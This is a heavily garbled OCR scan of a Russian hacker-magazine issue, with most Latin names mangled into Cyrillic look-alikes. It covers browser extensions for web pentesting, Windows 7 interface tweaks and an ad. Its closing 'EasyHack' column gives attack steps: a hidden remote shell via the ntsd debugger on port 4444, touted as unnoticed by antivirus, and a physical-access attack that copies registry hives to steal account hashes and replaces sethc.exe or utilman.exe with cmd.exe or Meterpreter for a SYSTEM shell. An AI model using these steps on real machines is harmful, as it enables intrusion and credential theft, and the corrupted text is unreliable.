Пищу для размышления может подкинуть 
информация о хосте из ѴѴН0І5 и других от- 
крытых источников. И, пожалуй, нет более 
удобного способа ее получить, нежели 
заюзать ІР АсИгезз іпЬгтаНоп. Расшире- 
ние в один клик предоставляет геолока- 
ционную информацию, справку из ѴѴН0І5, 
отчет из базы спам-ресурсов, данные о 
0І\І5, хостинге, а также (и это мое любимое) 
соседях по домену (других сайтах, которые 
хостятся на этом же сервере). 




бііниь огілкир. 

А 

ШЧ т івМІТ і Ьні^йІ РЧР ^ Ггѵп - 
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ѴѴеЬ Зегѵег ІЧоМіег 

Ьіі.Іу/пКѵѵ2пп4 

А это расширение от одного парижского 
ботаника (какой сам себя называет) де- 
лают одну, но очень важную вещь — пыта- 
ется определить веб-сервер, на котором 
крутится проект. Распознав АрасЬе, N5, 

N д і пх, 6ѴѴ5, БідЫТрсІ или какой-то другой 
веб-сервер, ѴѴеЬ Зегѵег ІЧоббег выводит 
соответствующую пиктограмму в адрес- 
ную строку. 
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ШЬ сіеѵеіортеі 

НііЬуфРіІВД*. І 4 ЙП адад-иѵ 
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ѴѴеЬ ТесЬпоІоду ІЧоМіег 

ЬіЫу/гЮІ_6уІ 

Не менее важно знать, какая технология ис- 
пользована для выполнения веб-приложения: 
РиЬу, РНР, АЗР.ІЧЕТ или что-то еще? ѴѴеЬ 
ТесЬпоІоду ІЧоббег пытается осуществить 
соответствующий бпдегргіпбпд. Важно, что 
выявляются еще и многие сопряженные с 
этими технологиями инструменты: например, 
РЬизіоп Раззепдегдля приложений на РиЬу 
или Хоре для приложений на РуіЬоп. 




НТТР Неасіегз 

ЬіМу/рІІ977 

Зачастую администраторы не пытаются 
скрыть информацию об используемых 
программных средствах и технологиях, 
и она отображается прямо в НТТР- 
заголовках (например, Х-РоѵѵегесІ-Ву 
и Зегѵег). Чтобы быстро посмотреть 
хедеры в ответах сервера, рекомендую 
установить аддон НТТР Неасіегз. 
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Манипуляция 
с Н ^-запросами 



Имея некоторое представление отом.счем имеем дело, можно приступать непосредственно 
каудиту. Инструментами первой необходимости тутявляются расширения, позволяющие, 
во-первых, отслеживать те НТТР-запросы, которые отправляются на веб-сервер, во-вторых, 
какугодно модифицировать их, «играя» с различными параметрами, и, в-третьих, удобно 
просматривать вернувшийся результат. 
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Кедиезі Макег ЬіМу/оКѴбѴѴѴ 

Для Еігеіох’а есть известный аддон Татрег Раіа, ко- 
торый на лету перехватывает и позволяет изменить 
НТТР/НТТР5-за головки, а также РОБТ-параметры. В 
силу ограничений архитектуры расширений Ѳоодіе 
СЬготе полностью реализовать аналогичный функ- 
ционал пока невозможно, но Педиезі Макегмакси- 
мально близко приблизился кэтому. С его помощью 
ты легко сможешь мониторить запросы, сделанные 
веб-страницами, играться с ІІРІ_, заголовками, 
и РОБТ-данными, атакже конструировать новые 
запросы. Тут надо отметить, что Редиезі Макег пере- 
хватывает не все, а только запросы, отправленные 
через НТМБ-формы или ХМШйрРециез^з, поэтому 
в логах не будет кучи лишней информации озагрузке 
изображений или 055-стилей. 



НИР Резропзе 
Вго\л/зег ЫМу/ 

оѴѴѵНІР 

Это расширение также, как и 
Редиезі Макег, предназначено 
для составления самых разных 
НТТР-запросов (правда с по- 
мощью ХМІ_НИрРедиезІ, что 
накладывает ограничения). Ты 
можешь изменять параметры 
запроса или хедеров и изучать 
реакцию приложения. 



Асіѵапсес] РЕ5Т сііепі 
Арріісаііоп ЫІ.Іу/рХо2ѴЬ 

Инструмент, изначально реализованный в виде 
расширения, а теперь СИ готе-п рил ожения 
(программы, работающей внутри браузера). В 
отличие от НТТР Резропзе Вгоѵѵзег, это не про- 
сто помощникдля составления произвольных 
НТТР-запросов. Абѵапсеб РЕ5Т сііепі пред- 
лагает много интересных фишек, в том числе 
продвинутый просмотр ответов в форматах 
650Ы иХМІ_с подсветкой синтаксиса, удобный 
составитель НТТР-заголовков (подсказки + 
система автодополнения) и многое другое. Не- 
заменимая вещь, когда необходимо взаимо- 
действовать с сервисами, возвращающими 
ответ в 650Ы или ХМІ_-форматах. 



Игры 

с кукисами 



Важным компонентом для работы веб- приложений являются кукисы, которые хранит браузер. С их 
помощью сервисы узнаюттебя, не запрашивая повторной авторизации, отслеживаюттвою активность 
(ай-ай-ай)и вообще сильно в них нуждаются. Увы, С И го те, как и другие браузеры, практически не пред- 
ставляют возможностей для манипуляции с кукисами. По умолчанию. 



I іЫгЫ I ■■ 0ЧИ! /ІЧ-Г» 
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ЕсІіІТЫз Соокіе Ьі Іу/рІ_СаОЫ 

Что удивительно, для манипуляции с куки- 
сами долгое время не было даже достойного 
расширения. И только сейчас появился за- 
мечательный аддон Ебіі ТЫз Соокіе, позво- 
ляющий через всплывающую панель удалить 
произвольные куки на текущем сайте, редак- 
тировать их значения или создать уже новые 
«плюшки». Очень радует возможность для 
автоматизации: задав регулярку для поиска, 
можно создать специальный фильтр, который 
будет автоматически удалять нежелатель- 
ные кукисы. Помимо этого есть опция для 
создания так называемых Реаб-ОпІу-кукисов, 
которые не сможет модифицировать никакой 
сайт и никакое другое расширение. 



□ Зъмр Му Снйрн - 0„, 




+ -& & 4 





Зѵѵар Му Соокіе$ ЬіІ.Іу/о|сХХІІ 

Необходимость использовать несколько аккаун- 
тов на одном и том же ресурсе возникает крайне 
часто. Чтобы не заморачиваться со входом- 
выходом, гораздо удобнее использовать аддон 
Бѵѵар Му Соокіез. По сути, это менеджер сессий. 
Для любого сайта ты можешь создать несколько 
профилей, каждый со своим набором кукисов, и 
быстро переключаться между ними. Я это делаю 
с помощью горячих клавиш. 



► 032 
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Пентест 

веб-приложений 



Для Ооодіе СЬготе есть несколько расширений, которые специально заточены для поиска 
Х55-дыр, 5СН_-уязв им остей, а также других брешей безопасности. Пригодятся также и не- 
сколько других аддонов, которые хотя напрямую и не связаны с пентестом, но могут помочь 
автоматизировать некоторые из действий (вроде подстановки зловредных значений в раз- 
ные места ввода данных). 





\Л/еЬ Зесигііу 

ЬіІ.Іу/гЫхии 

Если название покажется тебе знако- 
мым, неудивляйся. Возможно, когда- 
то ты использовал утилиту ѴѴеЬзеси гібу, 
представляющую собой мощную среду 
для тестирования безопасности веб- 
приложений. Позже разработчики 
реализовали функционал сканера 
в виде аддона для СЬготе. Поэтому 
теперь одним кликом можно запустить 
анализ сайта на наличие таких уязви- 
мостей, как ЗОИ Іщесііоп, Сгозз-зііе 
Зсгірііпд, Сгозз-зііе Педиезі Рогдегу, 
І_осаІ/ПетоІе Рііе I псіисіе и т.д. Все 
работает в автоматическом режиме. 



Х55 ГІКвг гс ѵ с гіс 
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Х55 Рауз ЬіІ.Іу/д2\л/ех$ 

Замечательный инструмент для 
пентестера, включающий в себя Х55- 
сканер, Х55 реверсер, а также инспек- 
тор объектов. Функция Зсап поможет 
быстро реализовать инъекцию для 
всех возможных местах ввода данных 
(аддон сам их определит и предложит 
на выбор). Нужно узнать, как конкрет- 
ная страница отфильтровывает вывод, 
но сорцов нет? Нет проблем — просто 
выбери опцию Реѵегзе — и вскоре ты 
увидишь, какие из символов разреше- 
ны. Инспектор объектов позволяет в 
реальном времени изменять содержи- 
мое функций и быстро разобраться в 
логике работы веб-приложения. 










РігѳЬид Іііеіог СЬготе 

ЬіПу/одсІдіі 

Нет лучшего инструмента для изучения особен- 
ностей работы веб-приложения, чем РігеЬид Іііе. К 
сожалению, он сильно отстает от своего старшего 
брата, функционал сильноурезан из-за ограни- 
чений архитектуры расширений Ооодіе СЬготе. 
Так, кпримеру, РігеЬид Іііе не имеет встроенного 
^ѵаЭсгірІ-отладчика, поэтомуты не сможешь в 
полной мере поковыряться с .^-скриптами. Но 
аддон все равно предоставляет немало полезных 
возможностей и, кпримеру, позволяетв реальном 
времени изменять и выполнение НТМЬ-кода, 

С55 на абсолютно любой странице. Отмечу также 
опцию Іпзресі: когда ты кликаешь на нужный тебе 
элемент сайта, РігеЬид Іііе мгновенно находитв 
сорцах код, который этот элемент реализует. 




Апіі Х55 ЬіІ.Іу/о781Кп 

Это расширение пассивно ана- 
лизирует код просматриваемых в 
браузере страниц и в случае обнару- 
жения слабых мест, чреватыхХЗЗ- 
инъекцией, предупреждает об этом, 
показывая соответствующий значок 
в адресной строке. Справедливости 
ради, стоитупомянуть, что аддон уже 
довольно продолжительный период 
не обновляется. 



іМасгозІог СЬготе 

ЫМу/р6Еиа9 

Если тебе необходимо автоматизировать 
какую-то проверку или фаззинг, то самый 
верный способ — создать макрос с помощью 
этого расширения. Один раз записав сцена- 
рий и показав браузеру последовательность 
действий, его можно воспроизводить сколько 
угодно раз на любой странице. Причем если 
ты уже создавал макросы в аналогичном 
аддоне, но для Рігеіох, то их не придется соз- 
давать заново — все заработает и в С Ь готе. 
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Анонимность 
и безопасность 



Если говорить о пентесте, нельзя не упомянуть аспекты своей собственной безопасности и 
анонимности. Берем основное: соединение через прокси (что может понадобиться и просто 
для работы с сервисами, которые накладывают ограничения по региону пользователя), 
работу с защищенными версиями сайта, отключение зловредных скриптов, тщательное 
удаление историй посещений. 



* 



Ргпйіггп: Рзтуугсй К ггпр+у. 

ЙЫІ і.ііТ.ѵііі уп(М 
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СІчА. Г Гн ІЛЯІГийІйПЪ. 




ЫоіЗсгіріз 

ЬіМу/ру5\Л/уу 

Этот сценарий, являющийся аналогом 
расширения ЫоЭсгірІдля Рі гебох, делает 
одну простую вещь — полностью отклю- 
чает выполнение скриптов на сайте. Это 
единственный гарантированный способ 
серфить зараженные сайты, откуда пач- 
ками грузятся трояны, а также защитить 
себя отХЭЭ и С1іск]'аскіпд атак :). 
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Чтобы сразу убедиться, что прокси рабо- 
тает, есть этот полезный аддон. ѴѴЬаІ із 
ту ір асігеззе покажеттекущий ІР-адрес, 
а также выдаст по нему полную инфор- 
мацию о провайдере, а также геолока- 
ционную информацию, включая страну и 
примерное месторасположение. 



ОШ 

[КВІ55І- ЕпГогсег 

/ ллйігу (ад ъгтьм 

СККІІАІП. I™ 

КШЫйСЕ ШПШі&Е БйШІКІШІ 

КВ55І_ЕпТогсег 

Ьіі.Іу/п1ѴК\л/2 

Не надо еще раз объяснять, насколько 
важно использовать защищенные вер- 
сии сайтов. Многие популярные ресурсы 
сейчас поддерживают работу через 55 Б, но 
не всегда предлагают их использовать по 
умолчанию. КВ 55І_ Епіюгсег позаботится, 
чтобы ты работал именно с 55І_-версией 
ресурса, если она существует. 




► * 












ЙПВПртНИИ Рг-ріу 






у нет* Ргсху 






V Але ЗмІсНМейі 






.у “Ьоиі ЗмЛсІту! 







«г ЙТатрегйегірі 
т (НІвйодіе Нэдоэг МіпітаПеііе 
V 1 Оеі пеѵѵ ЁСгірІб... 

СНеск Іог изегзсгірі ирсіаіез 

^ РІеаае сопзігіег а (іопаііоп 

йі АЬоиІ Татрвяпопкву 

* 




РгохуЗѵѵіісбу! 

ЬіМу/рМіг9Ѵ У 

О назначении этого расширения понятно 
из названия. Оно позволяет определить 
в настройках прокси-серверы и быстро 
между ними переключаться. Приятно, что 
в аддоне реализована система правил: 
для обозначенных II РІ_ аддон автомати- 
чески может переключаться на нужный 
прокси-сервер. Например, для того чтобы 
пользоваться онлайн-радио Рапбога, 
которое доступно только для пользова- 
телей из Америки, мы можем установить 
соответствующий прокси из Штатов. 



Татрегтопкеу 

Ьіі.Іу/дХѳІ_6т 



Ты наверняка знаешь о та ком инструменте, 
как Огеазетопкеу, позволяющем изме- 
нять просматриваемые страницы на лету 
с помощью специальных 65-скриптов, 
которые инъектируется в текущую страницу. 
Татрегтопкеу — это на 90% совместимый 
аналогдля СЬготе, который поддерживает 
большинство сценариев, написанных для 
Огеазетопкеу. Модифицировать страницу, 
убрав или добавив какие-то элементы, — 
задачка для этого расширения. Большая 
база уже готовых скриптов доступна на 
сайте изегзсгіріз.ога . 



СІіск&СІеап 

ЫМу/дІѵѵАОР 



Для того чтобы стереть следы пребывания 
на каком-то ресурсе, недостаточно только 
очистить куки браузера. Есть еще немало 
мест, где легко могут остаться отметки о тво- 
ей деятельности: это ЕІазЬ-соокіез, которые 
создаются на компьютере как І_50-объекты 
(Босаі 5Ьагеб С^'есЫ, и куки 5і Іѵегіід Ы:, и 
кэш баѵа. СІіск&СІеап позаботится о том, 
чтобы полностью удалить историю просмо- 
тров и загрузок, очистить кэш и почистить 
кукисы. Учти, аддон работаеттолько под 
виндой. 



► 034 
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ІІІІІІ 




АКУСТИЧЕСКИЕ СИСТЕМЫ 



ѵіѵѵѵѵѵ.есііііегги 

ПРОСТЫЕ ФОРМЫ 
НЕ ПРОСТОЙ ЗВУК 







Двухполосные деревянные сателлиты и мощный 6 Г 5" сабвуфер* 
Возможность одновременного подключения 2-х источников звука 
Беспроводной пульт ДУ 

Удобное расположение органов управления на внешнем усилителе 
Система автоматической компенсации искажений — 

ЕсііЛег ІпЬеІІідепІ ОізШгЬіоп Сопігоі 
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■ ■ Капитан Улитка 



Правильные ІЛ-хаки 

для ѴѴіпсІоѵѵз 7 



+5 к удобству работы системы 

© Нет, в этой статье не пойдет речь о всяких 
украшательствах и прочих подобных глупостях, которые 
нафиг никому не нужны. Мы поговорим о правильных, 
по-настоящему полезных хаках, благодаря которым с 
системой станет работать проще и удобнее. 




> сЫ 

Увеличитьсвою 
продуктивность и 
прокачать интерфейс 
системы ты можешь 
прямо сейчас — дис- 
трибутивы всех про- 
грамм собраны для 
тебя на диске. 



Надстройки 
для проводника 



Едва ли кто-то захочет поспорить, что проводник (он же ѴѴіпсІоѵѵз Ехріогег) совсем нето 
приложение мечты, которое идеально подходит для работы с файлами. Самое печальное, 
что даже если ты используешь какой-нибудь внешний файловый менеджер, тебе все равно 
время отвремени приходится иметьдело с пресловутым проводником. Можно ли довести 
его до ума? Разумеется, но надо установить несколько надстроек. 



^4] ѵрп-сопЯд^рр 
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ДМЗ**М [^Пійвше І^Рпзіееы | ^ ЗПаШагМйпиаІ 



ОТТаЬВаг 

дКаЬЬаг.ѵѵікісІоі.сот 

То, что сразу может прибавить пять баллов кудобству использования 
проводника, — это вкладки. Это же гениально простая, но катастро- 
фически необходимая вещь, которую почему-то никак не реализует 
сама МісгозоИ А воту открытого проекта ОТТаЬВаг, представляющего 
собой надстройку для ѴѴіпсІоѵѵз Ехріогег, есть форки — независимые 
ветки развития, которые поддерживаются разными разработчиками. 
На деле, разустановив надстройку в систему, понимаешь, что все это 
мракобесие с большим количеством окон проводника тебе и даром не 
нужно, а удобный интерфейс с вкладками — то, что нужно. 



► озб 



ІЙ №Ігшр145.ехе 



9/2Ш0 11:52 РМ 
5 КВ 



ѵрп| 

щ ѵрп а^ігідпіир 



' ѵрп- опГідлр 



Ц;, одеп '.'рп -2.й.9-оиі-1.0.3-тііаІІ.сде 
в Ц/іиіыі ѴРМ Здсигііу.ргіТ 




изіагу 

ѵѵѵѵѵѵ.изіагѵ.сот 

Еще одной опцией, которой катастрофически не хватает проводнику, 
является удобный поиск. И это можно исправить с помощью Ызіагу. 
Надстройка позволяет находить папки и файлы по принципу«ЕіпсІ- 
аз-уои-іуре». В любом окне ѴѴіпсІоѵѵз Ехріогег’а появляется дополни- 
тельная панелька с полем для поиска. Теперь можно набрать часть 
названия файлов — и в списке останутся только те элементы, которые 
подходят под этот критерий. Или другой вариант — использовать для 
фильтрации привычные маски «?», «*». Помимо поля для быстрого 
поиска, на этой панели есть еще несколько полезных кнопок: для бы- 
строго доступа кизбранным файлам или папкам, недавним докумен- 
там, атакже ряду зтагі-команд (запустить стсі.ехе втекущей папке, 
скопировать путь до папки в буфер обмена ит.д.). 
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ТегаСору 

ѵѵѵѵѵѵхогіезесіогхотЛегасорѵ.рНр 

Окончательно превратить проводник в человеческий файловый менеджер 
поможет программа ТегаСору. Если ты когда-нибудь пробовал скопиро- 
вать файлы обычным проводником и файловым менеджером вродеТоІаІ 
Сотппапсіег’а, то наверняка отмечал, что через последний эта операция 
выполняется гораздо быстрее. Весь секрет в правильной буферизации. 
Подобный механизм можно реализовать в проводнике, как раз с помощью 
ТегаСору. Но даже это не это главное. Куда важнее, что после установки ты 
получишь нормальный интерфейс для управления копированием файлов, 
с возможностью останавливать/восстанавливать копирование данных, 
повторять попытки записи при обнаружении ошибокили пропускать об- 
работку отдельных файлов. 



НазІѴГаЬ 

ЬееЫеЬгох.огд 

Последний хак в этом разделе не касается 
проводника напрямую, но прямым образом 
влияет на окно со свойствами выбранного 
файла. Среди отображаемых параметров 
файла не хватает одного, но очень важного 
— его контрольной суммы, по которой можно 
проверить целостность и достоверность. Так 
вот лучшей из программ, которая вычисляет 
различные хэш и для файла и при этом из- 
ящно встраивается в стандартный интерфейс 
винды, является НазЫаЬ. Обязательный 
тизі Ьаѵе! 



Прокачиваем 

таскбар 



Одним из главных новшеств ѴѴіпсІоѵѵз 7, к которому все давно уже привыкли, стала сильно прокаченная 
панель задач. То, для чего раньше нужны были хаки (вроде всплывающих превьюшек для окошек], теперь 
реализовано разработчиками МісгозоіТ Но это не значит, что нам нечего подправить. На самом деле есть. 




ѴѴіпсІоѵѵз 7 ТазкЬаг Ііетз Ріппег 

ѵѵѵѵѵѵ.с]оог2ѵѵіпс]оѵѵ5.сот 

Ты, вероятно, замечал, что в новом таскбаре можно за- 
крепитьтолько приложения (а вернее ехе-файлы). При 
этом нельзя перенести какой-то доку мент или скрипт и 
быстро обращаться кним. Это досадное ограничение 
можно снять, если установить эту небольшую утилиту, 
которая позволит разместить на таскабе произвольные 
файлы, папки и букмарки браузера. 




Віпз 

ѵѵѵѵѵѵ.опеиріпсІиз^гіез.сот/Ьіпв 

Если же хочешь сразу серьезно про качать таскбар, рекомендую 
эту программу. Послеустановки ты сможешь создавать на панели 
задач так называемые Віп — контейнеры для группировки иконок. 

То есть можно создать раздел «Браузеры» и бгад’п’сігор-нутьтуда 
иконки всех браузеров сразу. На панели задач отобразится иконка с 
уменьшенными изображениями всех программ сразу, а при нажатии 
появится панелька для запуска любой из них. 
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ЗирегЬагМопіІог 

зирегЬагтопіІог.сІе 

Разработчики приложений для ѴѴіпсІоѵѵз 7 получили возможность 
накладывать на иконки в панели задач индикаторы процесса. 
Асоздатели ЗирегЬагМопіІог решили воспользоваться этим и 
прямо в виде элементов панели задач реализовать элементы для 
индикации заряда батареи, использования памяти, свободного 
пространства на диске и т.д. Получилось очень неплохо. 



бтаіІЫоШіегРІиз 

Ыиѵ/71СѴп2 

С использованием всех новомодных фишекѴѴіпсІо\л/57 разработана 
и эта замечательная программа для уведомления о новых события в 
почтовом ящике ѲМаіІ (а им пользуется вся редакция). Помимо про- 
смотра заголовка новых сообщений, доступны функции для быстрого 
управления почтой — «перейти в ІпЬох», «написать новое письмо» и 
т.д. Все это реализовано через .Литр ЫзНы. 



Быстрый запуск 
приложении 



Понятно, что вынести на панельзадач абсолютно все программы, которые могут понадобиться, нереаль- 
но. Да и незачем, когда есть намного более удобный инструмент для быстрого запуска приложений. Если 
посмотреть на количество таких «запускалок», может показаться, что за их разработку не брался только 
самый ленивый. Только, увы, большинство из них — полный отстой. Но не эти. 




ЬаипсИу 

ѵѵѵѵѵѵ.ІаипсЬѵ.пе^ 

По правде говоря, удобнее способа запускать приложения, 
чем делать это с клавиатуры, для меня не существует. Я привык 
кБроШдЫ’у в Мае ОХ, и мне хотелось бы и в винде открывать 
приложения через специальную консоль, вызываемой горячей 
клавишей. БаипсЬу без всяких сомнений лучшая утилита для 
этих целей. Ты нажимаешь специальную комбинацию клавиш (у 
меня <С!гІ>+<5расе>), после чего появляется панель для ввода 
команды. Чаще всего достаточно набратьлишь часть названия 
приложения, и БаипсЬусама предложит подходящий вариант для 
запуска. Останется только нажать <Еп1ег>. БаипсЬу индексирует 
команды из меню «Пуск», документы, файлы проектов, папки и за- 
кладки — и все это позволяет быстро запускать с клавиатуры. Бо- 
леетого, можно дополнительноустановить плагины и еще больше 
нарастить функциональность всплывающей консоли (например, 
для запуска нужной сессии в 55Н-клиенте РиТТѴ по ее имени). 



НсйБсні ілсЛеп йп№ Йегмп 



ОрЬСЛІ 




И іУгнЬ кт 
ЁЭ иййЗЩ РмЬ 

Ьоп&н 032 $ 
0 О МйГС ІСйЛ Ьн ^ 



тиІііЬаг 

ѵѵѵѵ\л/.бспо.сот 

Удобная панельс иконками приложений — куда более популярный 
вариант для быстрого запуска приложений. Если хочешь наворо- 
ченное решение, приправленное большим количеством бонусов, 
попробуй пгшШЬаг. Это гибкий и красивый десктопный бар, на которой 
легко можно перетащить любые объекты, втом числе объединив их 
в группы. Если какое-то из п риложени й работаете файлами, то при 
наведении на его иконку отображаются недавно открытые документы. 
На иконке также отображается и наличие событий для данного при- 
ложения: их отслеживает т и ШЬа г. Помимо этого предлагается панель 
для локального псАска (на основе индексации) и поиска в инете. 



ЩтрРасІ 

ЬНр://Ыиѵ/рМеЦВН 

В самой последней версии Мае 05 X Ыоп появилась новая фича 
БаипсбрасІ. В винде же такую опциюуже давно можно было реализо- 
вать, установив приложение ^трРасІ, которое делаетуглы экрана 
функционально значимыми элементами. К примеру, можно сделать 
так, что при наведении курсора клевому верхнему углу, открывалось 
какое-то важное приложение. А при наведении, скажем, на правый 
угол — сворачивались все окна. Но самое главное, что в качестве 
действия может выскакивать удобная настраиваемая панель для 
запуска произвольных программ. 




ХАКЕР 09 /1 52/ 201 1 






4 



Управление 

окнами 



Возможность окон прилипать к правой и левой части экрана —удобнейшая штука ѴѴіпсІоѵѵз 7, которой 
я пользуюсь постоянно. Удивительно, как небольшая доработка поведения окна можетувеличить про- 
дуктивность работы. Но это не единственная возможность прокачать поведение окон, есть и другие хаки. 
Конечно, без них можно обойтись. Но зачем? С ними-то лучше. 




Цезкіорз 

ыиѵЛжгбі8 

То, что может помочь, но по какой-то не- 
понятной причине напрочь отсутствуете 
системе — это виртуальные рабочие столы. 
Правда, Місгозо^ все же выложила на сайте 
утилиту йезкіорз (кслову, написанную самим 
Марком Руссиновичом, виднейшим специа- 
листом по внутреннемуустройству ѴѴіпсІоѵѵз). 
йезкіорз поддерживает до четырех вирту- 
альных рабочих столов и предлагает пере- 
ключаться между ними при помощи горячих 
клавиш или иконки втрее. Важно, что перед 
подключением доступен предварительный 
просмотр всех рабочих столов. 




ЗбОсІезкІор 



ѵѵѵѵѵѵ.ЗбОсІезкіор.сот 

Программа предлагаетеще один 
способ увеличить пространство 
рабочего стола, но вместо дис- 
кретных виртуальных экрановтут 
используется принцип вращающе- 
гося барабана. На каждой части его 
поверхности находятся свои объ- 
екты, окна, ярлычки — и ты можешь 
плавно перемещаться по нему, 
имея перед глазами превьюшку 
всего, что на нем находится. Это 
можетзвучать дико, но на скриншо- 
те понятно, что это оченьудобный 
подход. 




Репсез 

ѵѵѵѵѵѵ.зІагсІоск.сот/ргосІис^зЛепсез 

Не могу не упомянуть очень качественную утилиту, 
которая может навести порядок на рабочем столе. Во- 
обще, если посмотреть, то пользователи разделяются 
на два типа: те, у которых всегда идеальный порядокна 
рабочем столе, и те, у которых там творится полный хаос. 
Эта прога поможет и тем, и другим. Репсез позволяет 
нанести на рабочий стол специальные области, пред- 
ставляющие собой контейнеры для ярлыков. Их можно 
какугодно перемещать по экрану или изменять размер, 
а находящиеся в них иконки будут повторять те же 
самые движения. В результате, все свои ярлычки можно 
разбить на категории и разместить в разных областях, 
что добавит немало удобства. Естьу Репсез и другая 
интересная опция: двойным кликом мыши по рабочему 
столу можно спрятать с экрана все контейнеры и иконки, 
после чего тем же движением вернуть все на место. 



Хаки для 
рабочего стола 



Какни крути, пространство рабочего стола весьма ограничено, и чтобы незажиматься в его рамках прихо- 
дится идти на некоторыеухищрения. Идеальным вариантом была бы установка дополнительных мониторов, 
но, если такой возможности нет, вполне можно обойтись без каких-либо дополнительных затрат. 



X Ни одного 
О Одно 

[О Ды (іврО 

ш Трн (Л;м) 

Я1 Трн Соси- спрш) 

ЕВ Че ™Р е 




Асег Огісіѵізіа 

Ы11у/дг51_2д 

Эта утилита разделяет экран на две, три или четыре 
секции, куда ты можешь перенести б гад & бгор’ом 
любое окно. Это действительно полезный хакдля 
всех владельцев больших мониторов, который раз- 
работала компания Асег. Смысл втом, что размеры 
окна автоматически подгоняются под выделенную 
область, а его месторасположение сохраняется. В 
результате окно автоматически появляется там, где 
нужно, и стеми размерами, которыетебе нужны. 




БѵѵіІ^сГіег 

іпзепііепі.пеі 

С помощью Зѵѵіісбегты сможешь переключать- 
ся между окнами системы намного эффектив- 
нее. Идея втом, что ты можешь на одном экране 
увидеть все окна одновременно и быстро вы- 
брать нужное. Практически точнотакже, какэто 
сделано вМасОЗХ. При этом горячие клавишы, 
которые поддерживаются программой, помогут 
переключаться между окнами гораздо быстрее. 

еХІга ВиКопз 

ѵѵѵѵѵѵ.хігаЬииопз.сот 

После установки этой тулзы, в заголовке окна 
помимо привычных трех кнопок («свернуть», 
«развернуть на весь экран», «закрыть») 
появится еще 9 дополнительных элементов, в 
том числе для придания окну эффекта прозрач- 
ности или, кпримеру, сворачивания его втрей 
(работает для любого приложения). 
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■ ■ Тюрин «ѲгеепСІод» Алексей (адгггсіодгадтаіі.сот) 





ЗАДАЧА: ПОДНЯТЬ СТАНДАРТНЫМИ 
СРЕДСТВАМИ УДАЛЕННЫЙ ШЕЛЛ ПОД 

ѵѵітоѵѵз. 



РЕШЕНИЕ: 

Недавно вычитал интересный способ для быстрой организации шелл- 
доступа на любом порту. Задача выглядит простой, ноесли ограничи- 
ватьсятолько стандартными возможностями ОС, то рабочих способов не 
такужи много. А этот — прости лаконичен :]. На машине, доступ к кото- 
рой мы хотим организовать, нужно выполнить всего лишь одну команду: 



піібсі --зегѵег Ііср : рог 1: =4444 саіс.ехе 



ІМТ50 — МІСГ 050 Й: І\ІТ ЗуппЬоІіс ОеЬиддег, какясно из названия, вхо- 
дящий «в поставку» с ОС дебаггер. Фактически располагается он в 
%ѴѴіпсІо\л/5%\5у5Іет 32. Данной командой мы запускаем пізсі на отладку 
калькулятора (саіс.ехе), хотя для нашей задачи подойдет любое другое 
приложение. Параметр -зегѵегуказывает, что мы поднимаем сервер для 
удаленной отладки приложения на порту 4444 (іср:роіі=4444). Теперь все 
готово для нашегоудаленного подключения. Ксожалению, обычным 
пеісаі’ом не подключиться, потому нам потребуется ещё один пізсі: 



піібсі -гетоііе Ііср : 5егѵег=192 . 168 . 138 . 128, рог1і=4444 

Здесь интуитивно понятный интерфейс и ясно, что параметром -гетоіе 
указывается, что происходитподключение кудаленному серверус 
соответствующим адресом на порт 4444. Все что нам потребуется после 
подключения — это ввести следующую команду: 



- к 1*1 




Эмуляция удаленного подключения к отладчику 
с доступом к шеллу 



. з Гіеіі 

Готово! У нас полноценный доступ к консоли, чего мы и хотели. 

К минусам этого способа можно отнести то, чтотулза пізсі была убрана из 
ѴѴіпсІоѵѵз 7 и 2008. Хотя в качестве клиента ее можно бесплатно скачать с 
сайта МБ и установить на семерку. 

Из плюсов — решение использует толь ко стандартные возможности 
ѴѴіпсІоѵѵз и, разумеется, не палится антивирусами. Кроме этого, пізсі 
можно запускать под обыкновенным пользователем. 




ЗАДАЧА: ПОЛУЧИТЬ ШЕЛЛ С ПРАВАМИ 
5Ѵ5ТЕМ, ИМЕЯ ФИЗИЧЕСКИЙ ДОСТУП К ПК. 



РЕШЕНИЕ: 

Продолжим темутонкостей ОС ѴѴіпсІоѵѵз. Пару-тройку номеров 
назад я писал прото, как можно выдрать из кэша винды учетки 
пользователей, которые в ней логинились. Способы локально- 
го повышения прав основаны на такой фиче, что в безопасном 
режиме в систему можно зайти под локальным админом, даже 
если данная учетная запись была отключена доменной политикой. 
Этот способ — рабочий. Но не такой элегантный, как хотелось бы, 
потому что следов отзахода под админом остается очень много. Что 
делать? Есть альтернативные варианты. 

1. Загружаемся с любого ЫѵеСО и монтируем файловую систему с 
виндой. Далее, если мы просто хотим стырить локальные учетки 
и кэши хэшей входов в ОС, то просто копируем файлы реестра из 
% ѴѴ і п б о ѵѵз %\зу зі е т 3 2\со пбід . 

2 . Если же нам хочется чего-то более интересного, то подменяем 



системные файлы. Либо зеібс.ехе, либо ипііітап.ехе. Почему их, 
спросишьты?Узнаешь позднее :). Оба файла лежат в %ѴѴіпбоѵѵз%\ 
зузІет32, подменить их можно либо на тот же стсПехе, либо на 
ехе’шник Меіегргеіег из МБ Е, либо на что-то еще (в зависимости 
оттвоих целей). 

3. После перезагрузки компьютера мы видим экран логина. 

Далее — магия :). Пять раз жми <5ЫЛ> — запустится подменен- 
ный зеібс.ехе, то есть «обработчик» зал и па ния клавиш. Нажи- 
май <ѴѴіп+ІІ> (либо кнопочку в углу) — запустится подмененный 
ипіііппап.ехе, то есть «специальные возможности». 

4 . В самом простом виде, если подмена была на стб.ехе, то перед 
тобой выскачет консоль. Еще раз уточню — это без захода в систе- 
му. Ну и самое хорошее: права у нас будут І\ІТ АІІТН О Р ІТУ/5УТЕМ , то 
есть максимальные. 

5 . Конечно, лучше подменять файлы на теіегргеіег. С нехитрыми 
манипуляциями он будет оставаться активным при входе в систему 
пользователя, а у нас появится возможность полнофункционально- 
го удаленного доступа. 

Резюмируя вышесказанное: физический доступ к компу — это 
почти 100% ѴѴІ N ! 



► 040 
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> СІѴСІ 

Все описанные про- 
граммы со всей ру- 
брики ищи на диске. 




ЗАДАЧА: ОПРЕДЕЛИТЬ, НА КАКИХ САЙТАХ 
АВТОРИЗИРОВАН ПОЛЬЗОВАТЕЛЬ. 



РЕШЕНИЕ: 

Данный выпуск ЕазуНаск посвящен скорее всяким тонкостям и легким 
извращениям, чем конкретному, хардкорному взлому, лобовым атакам. 
Но я считаю, что это даже интересней. Ведь конкретныеуязвимости и 
дырки ПО можно закрыть, а вот архитектурные недоработки или некор- 
ректное использование легитимного функционала поправитьтрудно. 

Но вернемся кнашей задаче. Какузнать, на каких ресурсах (Отаіі, 
